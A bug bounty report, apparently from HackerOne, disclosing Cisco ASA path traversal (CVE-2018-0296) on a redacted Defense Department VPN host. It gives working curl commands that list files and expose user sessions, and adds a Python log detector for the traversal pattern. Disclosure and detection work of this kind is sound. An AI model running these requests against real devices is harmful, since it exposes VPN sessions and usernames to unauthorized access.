[CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (█████████.mil)
Medium
U.S. Dept Of Defense
Reported by
sp1d3rs
## Description
I discovered a previously unidentified instance https://████/ (██████.mil) in the ███ network, vulnerable to CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296).
## POC
```
curl -i -k "https://█████████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
██████
We can disclose user sessions by querying /sessions:
```
curl -i -k "https://████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
## Suggested fix
Updating to the latest version should fix the issue. A fixed version should return a 404 "File not found" error.
Example of a patched version:
```
curl -i -k "https://mvpn3.███/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
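As an added defensive example (not part of the original report and not Cisco code): a small Python detector that scans web-server or proxy access logs for the traversal pattern used in the proof of concept above, percent-decodes and normalizes the request path, and labels each hit by status code, since a patched appliance answers 404 as described under the suggested fix. The log lines, client addresses and timestamps are constructed sample data, and the double percent-decoding is an assumed heuristic for encoded `..` segments, not behaviour documented for the appliance.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); not taken from the report.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2018:12:00:01 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json HTTP/1.1" 200 1874
203.0.113.7 - - [10/Jun/2018:12:00:02 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jun/2018:12:00:03 +0000] "GET /+CSCOU+/..%2f+CSCOE+/files/file_list.json HTTP/1.1" 200 1874
198.51.100.4 - - [10/Jun/2018:12:00:04 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 3310
198.51.100.9 - - [10/Jun/2018:12:00:05 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 210
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_line(line):
    """Parse one Common Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_traversal_to_cscoe(target):
    """Return (resolved_path, query) when the request walks through a '..' segment
    and resolves into the /+CSCOE+/ tree (the authenticated portal area), else None."""
    parts = urlsplit(target)
    # Decode twice so %2e%2e and double-encoded variants are seen as '..' (assumed heuristic).
    path = unquote(unquote(parts.path))
    if ".." not in path.split("/"):
        return None
    resolved = posixpath.normpath(path)
    if not resolved.startswith("/+CSCOE+/"):
        return None
    return resolved, parts.query


def detect_cve_2018_0296(log_text):
    """Scan access-log text and return one finding per traversal request into /+CSCOE+/."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = is_traversal_to_cscoe(rec["target"])
        if hit is None:
            continue
        resolved, query = hit
        listed_dir = parse_qs(query).get("path", [""])[0]
        findings.append({
            "client": rec["client"],
            "timestamp": rec["ts"],
            "raw_target": rec["target"],
            "resolved_path": resolved,
            "listed_dir": listed_dir,
            "status": rec["status"],
            # 200 means the appliance served the listing; 404 matches the patched
            # behaviour described in the report, so the request was only a probe.
            "outcome": "disclosure" if rec["status"] == 200 else "probe",
        })
    return findings


if __name__ == "__main__":
    for f in detect_cve_2018_0296(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['client']} {f['outcome']:10} "
              f"{f['resolved_path']} dir={f['listed_dir'] or '-'} status={f['status']}")
```

Feed real logs through `detect_cve_2018_0296` from a file; a `disclosure` outcome on a device you believed patched is the signal to verify its software version, and a burst of `probe` outcomes from one client is still worth noting as scanning activity.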
## Notes
In case you experience a request timeout when reproducing, try changing your IP/VPN.
## Impact
Path traversal, which can allow an unauthenticated attacker to disclose sensitive information such as VPN sessions, files and usernames. Under some conditions it is possible to cause a DoS.
## Related CVEs
CVE-2018-0296
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but …
## Report Details
State: Closed
Substate: Resolved
Bounty: $750.00
Weakness: Path Traversal